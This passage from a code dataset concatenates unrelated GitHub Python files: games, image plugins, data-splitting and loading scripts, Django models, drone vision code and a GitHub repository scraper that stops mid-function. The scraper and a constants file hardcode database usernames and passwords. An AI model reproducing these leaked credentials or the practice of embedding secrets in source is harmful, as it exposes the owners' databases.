\r\nroot=Tk()\r\nobj=Register(root)\r\n\r\nroot.mainloop()\r\n","repo_name":"farhana1604022/Pyhton_","sub_path":"signup/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7535030337","text":"def printTable(xAxis, yAxis):\n zero = 'X' if xAxis[0] else('O' if yAxis[0] else 0)\n one = 'X' if xAxis[1] else('O' if yAxis[1] else 1)\n two = 'X' if xAxis[2] else('O' if yAxis[2] else 2)\n three = 'X' if xAxis[3] else('O' if yAxis[3] else 3)\n four = 'X' if xAxis[4] else('O' if yAxis[4] else 4)\n five = 'X' if xAxis[5] else('O' if yAxis[5] else 5)\n six = 'X' if xAxis[6] else('O' if yAxis[6] else 6)\n seven = 'X' if xAxis[7] else('O' if yAxis[7] else 7)\n eight = 'X' if xAxis[8] else('O' if yAxis[8] else 8)\n \n print(f\" {zero} | {one} | {two} \")\n print(f\" ---|---|--- \")\n print(f\" {three} | {four} | {five} \")\n print(f\" ---|---|--- \")\n print(f\" {six} | {seven} | {eight} \")\n\ndef sum(a,b,c):\n return a + b + c; \n\ndef checkWin(xAxis, yAxis):\n winner = [[0,1,2],[3,4,5],[6,7,8],[0,3,6],[1,4,7],\n [2,5,8],[0,4,8],[2,4,6]]\n for win in winner:\n if(sum(xAxis[win[0]], xAxis[win[1]], xAxis[win[2]]) == 3):\n print(\"X Won the Game\")\n return 1\n if(sum(yAxis[win[0]], yAxis[win[1]], yAxis[win[2]]) == 3):\n print(\"O Won the Game\")\n return 0\n return -1\n\n\nif __name__ == \"__main__\": \n xAxis = [0,0,0,0,0,0,0,0,0]\n yAxis = [0,0,0,0,0,0,0,0,0]\n turn = 1\n print(\"Welcome to Tic Tac Toe\")\n while(True):\n printTable(xAxis, yAxis)\n if(turn == 1):\n print(\"Player X Chance\")\n value = int(input(\"Please Enter X Position: \"))\n xAxis[value] = 1\n else:\n print(\"Player O Chance\")\n value = int(input(\"Please Enter O Position: \"))\n yAxis[value] = 1\n \n winner = checkWin(xAxis, yAxis)\n if(winner != -1):\n print(\"Match Over\")\n break\n \n turn = 1 - turn\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 
","repo_name":"SaadMeer/Tic-Tac-Toe-Game-in-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71374211362","text":"import datetime\nimport os.path\nimport random\n\nimport httpx\nimport asyncio\n\nimport requests\nimport yaml\nfrom PIL import Image\nfrom io import BytesIO\n\nfrom plugins.RandomStr import random_str\n\n\ndef get_headers():\n user_agent_list = [\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\"]\n\n userAgent = random.choice(user_agent_list)\n headers = {'User-Agent': userAgent}\n return headers\n\n\nasync def arkGacha():\n headers = get_headers()\n url=\"http://api.elapsetower.com/arknightsdraw\"\n\n path=\"data/pictures/cache/\"+random_str()+\".png\"\n #path=\"moyu.png\"\n #print(path)\n if os.path.exists(path):\n return path\n else:\n async with httpx.AsyncClient(timeout=20,headers=headers) as client:\n r = await client.get(url)\n img = Image.open(BytesIO(r.content)) # 从二进制数据创建图片对象\n img.save(path) # 使用PIL库保存图片\n #print(path)\n return path\nasync def starRailGacha():\n with open('data/GachaData/StarRail.yaml', 'r', encoding='utf-8') as file:\n students= yaml.load(file, Loader=yaml.FullLoader)\n\n i = 0\n character = []\n\n while i < 10:\n if i==0:\n ass = random.randint(1, 150)\n if ass < 75:\n cha = random.choice(list(students.get(\"四星角色\").keys()))\n else:\n cha = random.choice(list(students.get(\"四星光锥\").keys()))\n character.append(cha)\n else:\n ass = random.randint(1, 150)\n if ass < 4:\n if ass < 2:\n cha 
= random.choice(list(students.get(\"五星角色\").keys()))\n else:\n cha = random.choice(list(students.get(\"五星光锥\").keys()))\n # print(cha)\n character.append(cha)\n if ass > 3 and ass < 40:\n if ass < 20:\n cha = random.choice(list(students.get(\"四星角色\").keys()))\n else:\n cha = random.choice(list(students.get(\"四星光锥\").keys()))\n character.append(cha)\n if ass > 39:\n cha = random.choice(list(students.get(\"三星光锥\").keys()))\n # print(cha)\n character.append(cha)\n i += 1\n\n # print(character)\n a = 193\n b = 221\n count = 0\n st = Image.open('data/GachaData/StarRail/bg.png')\n path =\"data/pictures/cache/\"+random_str() + '.png'\n for i in character:\n # 剪切图像\n # 发起超级融合\n\n st2 = Image.open(\"data/GachaData/StarRail/\" + i + \".png\")\n\n im = st\n mark = st2\n layer = Image.new('RGBA', im.size, (0, 0, 0, 0))\n # print(str(a)+'------'+str(b))\n layer.paste(mark, (a, b))\n a += 473\n count += 1\n if count == 5:\n b += 689\n a = 193\n out = Image.composite(layer, im, layer)\n st=out\n #st.show()\n st.save(path)\n #print(path)\n return path\nif __name__ == '__main__':\n #asyncio.run(arkGacha())\n asyncio.run(starRailGacha())","repo_name":"avilliai/Cyumis","sub_path":"plugins/gacha.py","file_name":"gacha.py","file_ext":"py","file_size_in_byte":4906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38043097680","text":"import csv\nimport os, sys\nimport os.path\nimport random\n\ndef train_dev_test_split(train_pctg=0.8,\n dev_pctg=0.1,\n filesavename='data/data_file.csv'):\n \"\"\"\n Split the data into training/dev/test through a train_pctg/dev_pctg/(1 - train_pctg - dev_pctg) split.\n The split is done independently within each class so that the class distribution is maintained.\n This function requires that all of the raw .avi video data be stored in a 'VIDEO_RGB' subfolder prior to running.\n It saves a csv file into the filesavename location (must have the data folder be created before running).\n :param train_pctg: % of data to use for training (e.g. 80%)\n :param dev_pctg: % of data to use for dev (e.g. 10%)... 
remainder of data after train/dev to be used for test\n :param filesavepath: file path and name to save the file -- must be within data subfolder\n :return:\n \"\"\"\n\n with open(filesavename, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n\n # get subdirectories in VIDEO_RGB\n video_RGB_path = os.path.join(os.getcwd(), 'VIDEO_RGB')\n\n # only grab service folders (ignoring .DS_store type files as well)\n serve_folders = [x for x in os.listdir(video_RGB_path) if 'service' in x]\n\n # iterate over each folder, and write train/dev/test samples to csv file\n for serve_label in serve_folders:\n subpath = os.path.join(video_RGB_path, serve_label)\n\n videos = []\n for vid in os.listdir(subpath):\n\n # make sure vid is an actual file and not .DS_Store type\n if os.path.isfile(os.path.join(subpath, vid)) and not vid.startswith('.'):\n vid = os.path.splitext(vid)[0] # get the filename before .avi\n videos.append(vid)\n\n # shuffle the video names in place\n random.shuffle(videos)\n\n # split into training/dev/test sets\n train_split_ind = int(round(train_pctg * len(videos)))\n dev_split_ind = train_split_ind + int(round(dev_pctg * len(videos)))\n\n train = videos[0:train_split_ind]\n dev = videos[train_split_ind:dev_split_ind]\n test = videos[dev_split_ind:]\n\n # write output to a 3-column csv file:\n # column 1 -- whether the file is used for train, dev, or test\n # column 2 -- name of the class (the type of serve)\n # column 3 -- name of the file (excluding .avi)\n for sample in train:\n writer.writerow(['train'] + [serve_label] + [sample])\n\n # write val_size proportion to csv as validation\n for sample in dev:\n writer.writerow(['dev'] + [serve_label] + [sample])\n\n # write remaining proportion to csv as test\n for sample in test:\n writer.writerow(['test'] + [serve_label] + [sample])\n\n return\n\nif __name__ == \"__main__\":\n # set random seed\n random.seed(1)\n\n train_dev_test_split()","repo_name":"vxia777/tennis_serve_recognition","sub_path":"dataprep_split.py","file_name":"dataprep_split.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8180202562","text":"# parametrizacoes da carga\r\nQTD_LOTE_REGISTROS_PROCESSADOS_LOG = 1000\r\nPATH_ARQUIVO_LOG = \"L:\\\\Projeto_POMUC_2019\\\\Log\\\\\"\r\nNM_ARQUIVO_LOG = \"pomucgastoslog\"\r\n\r\n\r\n# utilizado para indicar a configuracao dos dados a serem importados\r\nNM_DIRETORIO_RAIZ_DADOS = \"L:\\\\Projeto_POMUC_2019\\\\Base_Bruta\\\\\" # [IPEA]\r\nNM_PREFIXO_ARQUIVO = \"Extrator\"\r\nNM_ABA_ARQUIVO_DADOS = \"Dados\"\r\nNM_PREFIXO_DIRETORIO_DADOS = \"SIOP_\"\r\nQTD_LINHAS_PRIMEIRO_REGISTRO = 2\r\n\r\n\r\n# confiuracoes do banco de dados\r\nNM_SERVER = 'MSSQL2016\\\\Pesquisa' #'CV-BMNOTE\\\\CVALUEPROD'\r\nNM_DATABASE = 'POMUC_GASTOS'\r\nNM_DRIVER = '{SQL Server Native Client 11.0}'\r\nUSER_NAME = 'Bruno'\r\nPASSWORD = '1'\r\n# nome das tabelas do banco POMUC_GASTOS\r\n#NM_TB_ACAOSIOP = \"AcaoSIOP_N\"\r\nNM_TB_ACAOSIOP = \"AcaoSIOP\"\r\n\r\n# chaves(key) das estruturas Python:dict\r\nERRO_KEY = \"ERRO\"\r\nSUCESSO_KEY = \"SUCESSO\"\r\n\r\n\r\n# utilizado para verificar os valores maximos das colunas antes da importacao\r\nARRAY_CAMPOS_STR_SIOP = ['Esfera (desc.)', \r\n 'Órgão (desc.)',\r\n 'Unidade Orçamentária (desc.)',\r\n 'Função (desc.)', \r\n 'Subfunção (desc.)',\r\n 'Programa (desc.)', \r\n 'Programa (ano, desc.)',\r\n 'Objetivo (desc.)', \r\n 'Iniciativa (desc.)', \r\n 'Ação (ano, desc.)',\r\n 'Tipo de Ação 
(desc.)', \r\n 'Subtipo de Ação (desc.)', \r\n 'Localizador (ano, desc.)', \r\n 'Plano Orçamentário (ano, desc.)',\r\n 'Município (desc.)',\r\n 'UF (desc.)', \r\n 'IDOC (desc.)',\r\n 'IDUSO (desc.)', \r\n 'Fonte (desc.)', \r\n 'Natureza de Despesa (desc.)', \r\n 'GND (desc.)', \r\n 'Modalidade (desc.)', \r\n 'Elemento de Despesa (desc.)']\r\n\r\n\r\n# anos que serao analisados do SIOP\r\n\"\"\"\r\nLT_ANOS_ANALISADOS_SIOP = (\"2000\", \"2001\", \"2002\", \"2003\", \"2004\",\r\n \"2005\", \"2006\", \"2007\", \"2008\", \"2009\",\r\n \"2010\", \"2011\", \"2012\", \"2013\", \"2014\",\r\n \"2015\", \"2016\", \"2017\", \"2018\", \"2019\")\r\n\"\"\"\r\nLT_ANOS_ANALISADOS_SIOP = (\"2003\", \"2011\", \"2016\")\r\n\r\n\r\n#\r\nSTR_ESTRUTURA_CLAUSULA_INSERT_SIOP = \"\"\"\r\n INSERT INTO POMUC_GASTOS.dbo.AcaoSIOP ( \r\n AnoExercicio,AnoReferencia,\r\n IdEsfera,Esfera,IdOrgao,Orgao,\r\n IdUnidadeOrcamentaria,UnidadeOrcamentaria,\r\n Poder,IdFuncao,Funcao,\r\n IdSubFuncao,SubFuncao,\r\n IdPrograma,Programa, --variavel 'AnoPrograma' retirada\r\n Objetivo,Iniciativa,\r\n IdAcao,Acao, --variavel 'AnoAcao' retirada\r\n AcaoTipo,AcaoSubTipo,\r\n LocalizadorSIOP,LocalizadorSIOPDescricao,\r\n PlanoOrcamentario, --variavel 'AnoPlanoOrcamentario' retirada\r\n Municipio,UF,\r\n IdOperacaoCredito,OperacaoCredito,\r\n IdUso,Uso,\r\n IdFonte,Fonte,\r\n IdNaturezaDespesa,NaturezaDespesa,\r\n IdGrandeNaturezaDespesa,GrandeNaturezaDespesa,\r\n IdModalidade,Modalidade,\r\n IdElementoDespesa,ElementoDespesa,\r\n ValorLOA,ValorAutorizado,\r\n ValorEmpenhado,ValorEmpenhadoLiquidado,\r\n ValorPago,ValorPagoRAPPago,\r\n ArquivoImportacao,\r\n IndiceLinha\r\n )\"\"\"\r\n\r\n\r\n#\r\nARRAY_CAMPOS_SIOP = ['AnoExercicio',\r\n 'AnoReferencia',\r\n 'IdEsfera,Esfera',\r\n 'IdOrgao',\r\n 'Orgao',\r\n 'IdUnidadeOrcamentaria',\r\n 'UnidadeOrcamentaria',\r\n 'Poder',\r\n 'IdFuncao',\r\n 'Funcao',\r\n 'IdSubFuncao',\r\n 'SubFuncao',\r\n 'IdPrograma',\r\n 'Programa',\r\n 'Objetivo',\r\n 'Iniciativa',\r\n 'IdAcao',\r\n 'Acao',\r\n 'AcaoTipo',\r\n 'AcaoSubTipo',\r\n 'LocalizadorSIOP',\r\n 'LocalizadorSIOPDescricao',\r\n 'PlanoOrcamentario',\r\n 'Municipio',\r\n 'UF',\r\n 'IdOperacaoCredito',\r\n 'OperacaoCredito',\r\n 'IdUso',\r\n 'Uso',\r\n 'IdFonte',\r\n 'Fonte',\r\n 'IdNaturezaDespesa',\r\n 'NaturezaDespesa',\r\n 'IdGrandeNaturezaDespesa',\r\n 'GrandeNaturezaDespesa',\r\n 'IdModalidade',\r\n 'Modalidade',\r\n 'IdElementoDespesa',\r\n 'ElementoDespesa',\r\n 'ValorLOA',\r\n 'ValorAutorizado',\r\n 'ValorEmpenhado',\r\n 'ValorEmpenhadoLiquidado',\r\n 'ValorPago',\r\n 'ValorPagoRAPPago',\r\n 'ArquivoImportacao',\r\n 'IndiceLinha']\r\n\r\n","repo_name":"bmsmiranda/myportfolio","sub_path":"IPEA/POMUC-GASTOS-2019-2020/GASTOS_CARGA_SIOP/pomucgastos_constantes.py","file_name":"pomucgastos_constantes.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15219747076","text":"# coding=utf-8\nimport uuid\nfrom django.db import models\nfrom django.contrib.postgres.fields import IntegerRangeField, DateTimeRangeField\nfrom django.utils.timezone import localtime\nfrom psycopg2.extras import NumericRange\n\nfrom apps.common.models import AbstractObservation\n\n\nclass Zsj(models.Model):\n \"\"\"Basic residential unit in the Czech rep., officially called 'Zakladni\n sidelni jednotka'.\"\"\"\n id_by_provider = models.CharField(\n help_text=\"ID of the ZSJ used by Czech law.\",\n max_length=100,\n editable=False\n )\n name = models.CharField(\n 
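# unlike id_by_provider above, this field stays editable and provides the default ordering (see Meta.ordering)\n        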
help_text=\"Human-readable name of the ZSJ.\",\n max_length=100\n )\n\n class Meta:\n ordering = ['name']\n\n def __str__(self):\n return self.name + ', ' + self.id_by_provider\n\n\nclass MobilityStream(models.Model):\n \"\"\"Mobility stream from one ZSJ to another.\"\"\"\n src_zsj = models.ForeignKey(\n Zsj,\n help_text=\"Source ZSJ, where people are departing.\",\n related_name='arrival_streams',\n editable=False,\n on_delete=models.DO_NOTHING\n )\n dst_zsj = models.ForeignKey(\n Zsj,\n help_text=\"Destination ZSJ, where people are arriving.\",\n related_name='to_streams',\n editable=False,\n on_delete=models.DO_NOTHING\n )\n opposite = models.OneToOneField(\n 'self',\n help_text=\"Stream in opposite direction to this stream.\",\n editable=False,\n null=True,\n on_delete=models.DO_NOTHING\n )\n\n class Meta:\n ordering = ['src_zsj__name', 'dst_zsj__name']\n unique_together = (\n (\n 'src_zsj',\n 'dst_zsj',\n ),\n )\n\n def __str__(self):\n return self.src_zsj.name + '->' + self.dst_zsj.name\n\n\nANY_OCCURRENCE = \"0\"\nTRANSIT_OCCURRENCE = \"1\"\nVISIT_OCCURRENCE = \"2\"\nOCCURRENCE_CHOICES = (\n (ANY_OCCURRENCE, 'Any'),\n (TRANSIT_OCCURRENCE, 'Transit'),\n (VISIT_OCCURRENCE, 'Visit'),\n)\n\nUNIQUES_ALL = \"0\"\nUNIQUES_UNIQUE = \"1\"\nUNIQUES_CHOICES = (\n (UNIQUES_ALL, 'All'),\n (UNIQUES_UNIQUE, 'Uniques'),\n)\n\n\nclass MobilityObservation(AbstractObservation):\n feature_of_interest = models.ForeignKey(\n MobilityStream,\n help_text=\"Stream station where the observation was taken.\",\n editable=False,\n on_delete=models.DO_NOTHING\n )\n src_occurrence_type = models.CharField(\n help_text=\"Occurrence type in the source ZSJ.\",\n max_length=1,\n choices=OCCURRENCE_CHOICES,\n default=ANY_OCCURRENCE,\n )\n dst_occurrence_type = models.CharField(\n help_text=\"Occurrence type in the destination ZSJ.\",\n max_length=1,\n choices=OCCURRENCE_CHOICES,\n default=ANY_OCCURRENCE,\n )\n uniques_type = models.CharField(\n help_text=\"All or only uniques.\",\n max_length=1,\n choices=UNIQUES_CHOICES,\n default=UNIQUES_ALL,\n )\n result = models.PositiveIntegerField(\n help_text=\"Numerical value of the measured phenomenon in units \"\n \"specified by Process.\",\n null=True,\n editable=False,\n )\n\n @property\n def result_for_human(self):\n if self.result is not None:\n res_str = \"{}\".format(self.result)\n else:\n reason = self.result_null_reason\n if(reason == 'HTTP Error 204'):\n reason = 'differential privacy'\n res_str = 'unknown because of ' + reason\n return res_str\n result_for_human.fget.short_description = 'Result'\n\n class Meta:\n get_latest_by = 'phenomenon_time_range'\n ordering = [\n '-phenomenon_time_range',\n 'feature_of_interest',\n 'procedure',\n 'observed_property',\n 'src_occurrence_type',\n 'dst_occurrence_type',\n 'uniques_type',\n ]\n # unique_together see migration 0008 and 0009, index o2_mobilityobservation_uniq\n\n def __str__(self):\n pt_l_local = localtime(self.phenomenon_time_range.lower)\n pt_u_local = localtime(self.phenomenon_time_range.upper)\n\n return \"{} from {} to {} on {} ({} -> {}, {}) was {}\".format(\n self.observed_property.name,\n self.feature_of_interest.src_zsj.name,\n self.feature_of_interest.dst_zsj.name,\n pt_l_local.strftime('%Y-%m-%d'),\n u'{}–{}'.format(\n pt_l_local.strftime('%H:%M'),\n pt_u_local.strftime('%H:%M'),\n ),\n self.get_src_occurrence_type_display(),\n self.get_dst_occurrence_type_display(),\n self.get_uniques_type_display(),\n self.result_for_human,\n )\n\n\nANY_GENDER = \"-\"\nMALE_GENDER = \"m\"\nFEMALE_GENDER = 
\"f\"\nGENDER_CHOICES = (\n (ANY_GENDER, 'Any'),\n (MALE_GENDER, 'Male'),\n (FEMALE_GENDER, 'Female'),\n)\n\nclass SocioDemoObservation(AbstractObservation):\n feature_of_interest = models.ForeignKey(\n Zsj,\n help_text=\"ZSJ where the observation was taken.\",\n editable=False,\n on_delete=models.DO_NOTHING\n )\n age = IntegerRangeField(\n help_text=\"Age of the population.\",\n editable=False,\n )\n def age_for_human(self):\n if(self.age.lower==0 and self.age.upper is None):\n age = 'Any age'\n else:\n if self.age.upper is None:\n age = '{}+ years'.format(self.age.lower)\n else:\n upper = self.age.upper\n if not self.age.upper_inc:\n upper -= 1\n age = '{}–{} years'.format(\n self.age.lower,\n upper\n )\n return age\n age_for_human.short_description = 'Age'\n age_for_human.admin_order_field = 'age'\n\n gender = models.CharField(\n help_text=\"Gender of the population.\",\n max_length=1,\n choices=GENDER_CHOICES,\n editable=False,\n default=ANY_GENDER,\n )\n occurrence_type = models.CharField(\n help_text=\"Occurrence type in the ZSJ.\",\n max_length=1,\n choices=OCCURRENCE_CHOICES,\n editable=False,\n )\n result = models.PositiveIntegerField(\n help_text=\"Numerical value of the measured phenomenon in units \"\n \"specified by Process.\",\n null=True,\n editable=False,\n )\n\n @property\n def result_for_human(self):\n if self.result is not None:\n res_str = \"{}\".format(self.result)\n else:\n reason = self.result_null_reason\n if(reason == 'HTTP Error 204'):\n reason = 'differential privacy'\n res_str = 'unknown because of ' + reason\n return res_str\n result_for_human.fget.short_description = 'Result'\n\n class Meta:\n get_latest_by = 'phenomenon_time_range'\n ordering = [\n '-phenomenon_time_range',\n 'feature_of_interest',\n 'observed_property',\n 'procedure',\n 'age',\n 'gender',\n 'occurrence_type',\n ]\n # unique_together see migration 0008 and 0009, index o2_sociodemoobservation_uniq\n\n def __str__(self):\n pt_l_local = localtime(self.phenomenon_time_range.lower)\n pt_u_local = localtime(self.phenomenon_time_range.upper)\n\n if(self.age.lower==0 and self.age.upper is None):\n age = 'Any age'\n else:\n age = u'{}–{} years'.format(\n self.age.lower,\n getattr(self.age, 'upper', u'∞')\n )\n\n return \"{} of {} on {} at {} ({}, {}, {}) was {}\".format(\n self.observed_property.name,\n self.feature_of_interest.name,\n pt_l_local.strftime('%Y-%m-%d'),\n u'{}–{}'.format(\n pt_l_local.strftime('%H:%M'),\n pt_u_local.strftime('%H:%M'),\n ),\n age,\n self.get_gender_display() + ' gender',\n self.get_occurrence_type_display(),\n self.result_for_human,\n )\n","repo_name":"gis4dis/poster","sub_path":"apps/processing/o2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8043,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"41316870851","text":"# -*- coding: utf-8\nfrom emoji import emojize\nbattery = emojize(\":battery:\")\nlow_battery = emojize(\":low_battery:\")\nelectric_plug = emojize(\":electric_plug:\")\nlaptop = emojize(\":laptop:\")\ndesktop_computer = emojize(\":desktop_computer:\")\nprinter = emojize(\":printer:\")\nkeyboard = emojize(\":keyboard:\")\ncomputer_mouse = emojize(\":computer_mouse:\")\ntrackball = emojize(\":trackball:\")\ncomputer_disk = emojize(\":computer_disk:\")\nfloppy_disk = emojize(\":floppy_disk:\")\noptical_disk = emojize(\":optical_disk:\")\ndvd = emojize(\":dvd:\")\nabacus = 
emojize(\":abacus:\")\n","repo_name":"numengo/python-vishuda","sub_path":"vishuda/models/emojis/objects/computer.py","file_name":"computer.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70084663841","text":"import cv2 \nimport time\nimport numpy as np\nfrom VisionLib import black_line,vision_debug,color_recognition\nfrom typing import List, Optional, Tuple, Union\nfrom PIL import Image \nimport serial\nimport time\nimport binascii\nmode=1\nmove_x=\"00\"\nmove_y=\"00\"\nmove_yaw=\"00\"\nmode=0x01\nser0 = serial.Serial('/dev/ttyAMA0',460800)\nif ser0.isOpen ==False:\n ser0.open()\nif __name__ == '__main__':\n \n cap = cv2.VideoCapture(0)\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640.0)\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480.0)\n cap.set(cv2.CAP_PROP_FOURCC,cv2.VideoWriter_fourcc('M','J','P','G'))\n LOWER = np.array([0, 0, 0])\n UPPER = np.array([100, 100 ,100])\n red=0\n t=0\n while True:\n ret,frame = cap.read()\n result=color_recognition(frame)\n print(result)\n if result == \"red\" :\n t=t+10\n else :\n t=t-10\n if t >=50 :\n red=1\n if t<=20 :\n red=0\n if t>=80:\n t=80\n if t<=0 :\n t=0\n print(red)\n ","repo_name":"DBLYBB/UAV_2023","sub_path":"UAV-Code/mypython/Test/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"4750600641","text":"from pymongo import MongoClient\nfrom bson import json_util\n\nimport requests as rq\nfrom bs4 import BeautifulSoup\n\nimport MySQLdb\nimport json\nimport threading\nimport re\nimport sys\nimport traceback\nimport os\nimport time\nimport yaml\nimport json\nimport queue\n\nfrom datetime import datetime\n\nfrom github import Github, GithubException\n\nprint(\"Executando scrapper...\")\n\nmyDB = MySQLdb.connect(host=\"127.0.0.1\",port=3306,user=\"devops\",passwd=\"BHU*nji9\",db=\"devops\")\ncHandler = myDB.cursor()\ncHandler.execute(\"SELECT * FROM dockerfile\")\nresults = cHandler.fetchall()\n\nprint(\"Banco de dados lido...\")\n\nclient = MongoClient()\ndb = client['repos-database']\nmongoRepos = db['repos']\nmongoDockerFiles = db['dockerfile_repos']\nheaders = {'user-agent':'Mozilla/5.0'}\n\ntokens = []\nwith open(\"./resources/tokens.txt\",'r',encoding='utf-8') as tokenFile:\n for token in tokenFile:\n tokens.append(token.strip())\n\ndef repoExtractGit(id,repoName,token,dockerfilePath,resultQueue=None):\n repoId = None\n repoQuery = mongoRepos.find_one({\"name\":repoName})\n try:\n if(repoQuery is None):\n urlRepo = \"https://github.com/\"+repoName\n pageRepo = rq.get(urlRepo,headers=headers)\n if(not pageRepo.status_code == 404):\n path = re.sub('https://github.com/','',pageRepo.url)\n if(repoName!=path):\n repoName=path\n repoQuery = mongoRepos.find_one({\"name\":repoName})\n if(repoQuery is None):\n g = Github(token)\n repo = g.get_repo(path)\n repoId = mongoRepoInsert(repoName,repo)\n repoQuery = mongoRepos.find_one({\"name\":repoName})\n if(repoQuery is None):\n print(\"Repositório Vazio!\")\n resultQueue.put((id,\"done\"))\n return None\n else:\n print(\"Repositório Inexistente!\")\n resultQueue.put((id,\"done\"))\n return None\n dockerfileExtract(repoName,dockerfilePath,repoQuery)\n print(\"Dockerfile \"+str(id)+\" salvo\")\n resultQueue.put((id,\"done\"))\n return repoId\n except rq.exceptions.ReadTimeout:\n print(\"ReadTimeout, tentando novamente\")\n return 
repoExtractGit(id,repoName,token,dockerfilePath,resultQueue)\n except GithubException as e:\n print(\"Ocorreu um erro na requisição do github : \"+e.data['message'])\n resultQueue.put((id,\"done\"))\n print(\"Sai do Thread \"+str(id))\n except rq.exceptions.ConnectionError:\n print(\"ConnectionErro, tentando novamente\")\n return repoExtractGit(id,repoName,token,dockerfilePath,resultQueue)\n return repoId\n\ndef mongoRepoInsert(repoName,g):\n try:\n urlRepo = \"https://github.com/\"+repoName+\"/tree/\"+g.default_branch\n urlReadme = \"https://raw.githubusercontent.com/\"+repoName+\"/\"+g.default_branch+\"/README.md\"\n pageRepo = rq.get(urlRepo,headers=headers)\n pageReadme = rq.get(urlReadme,headers=headers)\n infos={}\n bsRepo = BeautifulSoup(pageRepo.text,\"html.parser\")\n language = bsRepo.find(\"ol\",attrs={'class':'repository-lang-stats-numbers'})\n if(language!=None):\n languages = language.find_all(\"a\")\n language = {}\n for l in languages:\n language[l.find(\"span\",attrs={'class':'lang'}).text]=float(re.sub('%','',l.find(\"span\",attrs={'class':'percent'}).text))/100\n language=dict(language)\n infos[\"languagues\"]=language\n infos[\"watchers\"] = int(g.watchers_count)\n infos[\"stars\"] = int(g.stargazers_count)\n infos[\"forks\"] = int(g.forks_count)\n infos[\"created_at\"] = g.created_at\n infos[\"updated_at\"] = g.updated_at\n infos[\"default_branch\"] = g.default_branch\n if(not pageRepo.status_code==404 and not bsRepo.find('div',attrs={'class':'blankslate blankslate-narrow'})):\n infos[\"commits\"] = getTotalByApi(bsRepo.find(\"ul\",attrs={\"class\":'numbers-summary'}).select('li:nth-of-type(1) > a > span'),repoName,\"commits\")\n infos[\"branches\"] = getTotalByApi(bsRepo.find(\"ul\",attrs={\"class\":'numbers-summary'}).select('li:nth-of-type(2) > a > span'),repoName,\"branches\")\n infos[\"releases\"] = getTotalByApi(bsRepo.find(\"ul\",attrs={\"class\":'numbers-summary'}).select('li:nth-of-type(3) > a > span'),repoName,\"releases\")\n repoLicense = bsRepo.find(\"ul\",attrs={\"class\":'numbers-summary'}).select('li:nth-of-type(5)')\n if not repoLicense:\n repoLicense=None\n else:\n repoLicense = repoLicense[0].text.strip()\n else :\n return None\n infos[\"license\"] = repoLicense\n forkedFrom = None\n if(g.fork and mongoRepos.find_one({\"name\":g.parent.full_name})):\n 